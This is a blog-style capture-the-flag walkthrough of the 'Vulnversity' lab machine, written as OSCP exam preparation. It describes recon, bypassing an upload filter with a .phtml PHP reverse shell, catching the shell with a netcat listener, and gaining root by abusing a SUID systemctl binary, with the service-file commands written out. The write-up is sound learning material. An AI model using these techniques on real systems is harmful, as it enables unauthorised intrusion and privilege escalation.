OSCP Prep: Vulnversity without metasploit

Learn about active recon, web app attacks and privilege escalation.

With the nmap scan I see several ports open but 3333 sticks out the most for 2 reasons.

1 http normally runs on port 80 not 3333.

2 The name of the http title is vuln university which is the name of this box

So now I simply typed the IP address with the http port and discovered a website.

From here I was able to use dirsearch to discover hidden directories

I discovered a hidden directory for /internal/

Which appears to be an upload page

From here I was able to download a PHP reverse shell and save it in a text editor

Went inside the file and modified the ip address to the vpn connection or tun0/tap0

My VPN Ip address is

You can leave the port the same

I attempted to upload the file but the php extension is blocked

Phtml extension is allowed on this server so I changed the extension name on the file

The file was successfully uploaded

From here I did another dirsearch and found an upload page. Once we submit the reverse shell to the file upload page on /internal/ we naviagte to /internal/uploads to get a shell ( activate the reverse shell)

here is the dirsearch finding of the reverse shell activation

I now have a shell on the machine. Once you create a listener for the port using nc -lnvp 1234

You can execute the payload by going to the following site

Here I found the user flag

From here I hosted the linpeas.sh file on a server so I could download linpeas on the machine

Here we discover a SUID vulnerability

I slightly modified the script that was provided.


echo ‘[Service]


ExecStart=/bin/sh -c “chmod +s /bin/bash”


WantedBy=multi-user.target’ > $TF

/bin/systemctl link $TF

/bin/systemctl enable — now $TF

From here I was able to copy and paste the whole script for the systemcl suid and gain root

eJPT | Sec+ | Cyber Security Enthusiast. I plan on obtaining the ecpptv2 and OSCP in 2021. Just documenting my experience of becoming a pentester along the way.